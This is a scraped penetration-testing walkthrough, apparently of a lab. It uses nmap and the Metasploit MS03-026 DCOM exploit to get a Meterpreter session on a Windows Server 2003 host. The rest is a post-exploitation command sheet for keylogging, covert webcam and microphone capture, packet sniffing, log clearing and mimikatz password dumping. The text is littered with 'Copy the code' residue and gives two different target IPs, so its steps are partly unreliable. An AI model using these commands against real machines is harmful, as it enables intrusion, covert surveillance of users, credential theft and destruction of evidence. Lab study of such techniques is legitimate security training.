Information collection
The IP address of the target plane is 192.168.173.136
Use the NMAP tool to scan its open ports, systems, etc
OS version: Windows Server 2003
Open ports and Services:
21/tcp ftp 135/tcp msrpc 139/tcp netbios-ssn 445/tcp microsoft-ds 777/tcp multiling-http 1025/tcp NFS-or-IIS 1026/tcp Lsa-or-nterm 1029/ TCP MS-LSA 1030/ TCP IAD1 6002/ TCP X11:2 7001/ TCP AFS3-callback 7002/ TCP AFS3-PRServer 8099/ TCP Unknown serviceCopy the codeVulnerability analysis
Port 135 is enabled on the target host. The service is MSRPC (Remote Procedure Call Service), that is, Windows RPC service.
For this service, we can try to take advantage of it.
The exploit
Kali opens Metaspolit:
root@kali:~# msfconsole
Copy the codeFind all vulnerability attacks related to Windows RPC:
msf5 > search dcom
Copy the code
msf5 > use exploit/windows/dcerpc/ms03_026_dcom
Copy the codeTo implement the attack, look at the options and conditions for vulnerability attacks:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > show options
Copy the code
Msf5 exploit(Windows/dcerPC/MS03_026_dcom) > set RHOSTS 192.168.174.136 RHOSTS => 192.168.174.136Copy the codeWith the attack conditions set, the next step is to attack:
msf5 exploit(windows/dcerpc/ms03_026_dcom) > exploit
Copy the code
meterpreter > ipconfig
Copy the code
Meterpreter runs the related command
Basic system commands —————————— shell Enter the target host CMD shell reboot Restart the target host shutdown Disable the target host sysInfo View the system information of the target host background Place the current session in the background INFO Run Run the existing module. Enter run and press TAB to complete the information. Existing scripts are listed. Clearav Clears application program logs, system logs, and security logs in Windows. Ipconfig Viewing network configuration informationCopy the codeProcess list: —————————— getuId Obtain the system ID and computer name getPid Obtain the ID of the current process kill End process ps List the processes that are runningCopy the codeMouse/keyboard operation —————————— keyscan_start Enables key recording sessions keyscan_stop Terminates key recording sessions keyscan_dump dumps key recording records captured from the target host uictl enable mouse Enables the mouse Uictl disable mouse Disables the mouse uICtl enable Keyboard Enables the keyboard uICtl disable keyboard Disables the keyboardCopy the codeSession —————————— enumdesktops List all accessible desktops and workstations getDesktop Obtain the current Meterpreter desktop setDesktop Change the current Meterpreter desktopCopy the codeSniffer —————————— use sniffer load sniffer_interfaces View the nic sniffer_start Sniffer_stats View the nic status sniffer_stop Stop sniffer_dump of the nic and dump the captured data from the target host to the local hostCopy the codeCamera command —————————— webcam_list Lists all the cameras in the system. Webcam_snap Uses the camera of the target host to take photos record_mic Records ambient sound from the default microphone of the host. Webcam_stream Enables videos through the cameraCopy the codeRemote desktop/Screenshot —————————— enumdesktops Viewing available desktops getDesktop Obtaining the desktops associated with the current Meterpreter set_desktop Setting the desktops associated with the Meterpreter -h Viewing the help Screenshot use espia or use the Espia module to take a screenshot and then enter ScreenGrab Run VNC to connect to the REMOTE desktop using VNCCopy the codeFetch password —————————— load mimikatz View help wDigest obtain wDigest password mimikatz_command -f samdump::hashes Run the mimikatz original command mimikatz_command -f sekurlsa::searchPasswordsCopy the code